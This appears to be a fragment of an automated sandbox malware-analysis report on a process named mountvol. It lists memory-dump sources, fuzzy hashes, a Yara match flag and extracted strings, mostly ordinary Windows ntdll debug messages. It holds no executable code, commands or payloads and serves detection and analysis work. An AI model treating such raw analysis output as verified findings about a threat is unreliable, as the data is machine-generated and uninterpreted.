                                                                                        • Source File: 00000006.00000002.3914793605.00000000034B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_34b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 514d73a7f4ab21d4d932a890e4ce65e0a20f4d3143052927d0678a0d02ad7602
                                                                                        • Instruction ID: 905749200fc6ab3dc286ebadec6df972722089d1c62458aebf794da76723554e
                                                                                        • Opcode Fuzzy Hash: 514d73a7f4ab21d4d932a890e4ce65e0a20f4d3143052927d0678a0d02ad7602
                                                                                        • Instruction Fuzzy Hash: 98411674518B094FD3A8EF6990806B7F3F1FB85301F50052ED986CB762EB70E8468798
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 96263d933a67afa1813f113d865d3ed94af2211f082a9bc4c2e57c2392b135e8
                                                                                        • Instruction ID: f74dcde1fddb968bae478a1d0906b93378c74684c1e69e90ebffe6b38151a944
                                                                                        • Opcode Fuzzy Hash: 96263d933a67afa1813f113d865d3ed94af2211f082a9bc4c2e57c2392b135e8
                                                                                        • Instruction Fuzzy Hash: 8DC08C3BE8102102C711086E7C921F0F7A0E78B235F7032A3F808E3240D043C41B03DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3914793605.00000000034B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_34b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                        • API String ID: 0-3754132690
                                                                                        • Opcode ID: c9b720345542e1ea52292338a56c9f338c6a2f3d5ad92c4eb198a7c0e500b2b2
                                                                                        • Instruction ID: 3fcb300c1f1518be7022d9a94dffefe2376eb8dc88362319758d2e2c06c95ba5
                                                                                        • Opcode Fuzzy Hash: c9b720345542e1ea52292338a56c9f338c6a2f3d5ad92c4eb198a7c0e500b2b2
                                                                                        • Instruction Fuzzy Hash: 589161F04482988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB95
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03154742
                                                                                        • ExecuteOptions, xrefs: 031546A0
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03154725
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031546FC
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03154787
                                                                                        • Execute=1, xrefs: 03154713
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03154655
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 0-484625025
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-$0$0
                                                                                        • API String ID: 1302938615-699404926
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$[$]:%u
                                                                                        • API String ID: 48624451-2819853543
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 0315031E
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031502BD
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031502E7
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                        • API String ID: 0-2474120054
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 03157BAC
                                                                                        • RTL: Resource at %p, xrefs: 03157B8E
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03157B7F
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 0-871070163
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0315728C
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 031572C1
                                                                                        • RTL: Resource at %p, xrefs: 031572A3
                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03157294
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-605551621
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        • API String ID: 48624451-3050659472
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-
                                                                                        • API String ID: 1302938615-2137968064
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$@
                                                                                        • API String ID: 0-1194432280
                                                                                        APIs
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0316CFBD
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8
                                                                                        • String ID: @$@4Qw@4Qw
                                                                                        • API String ID: 4062629308-2383119779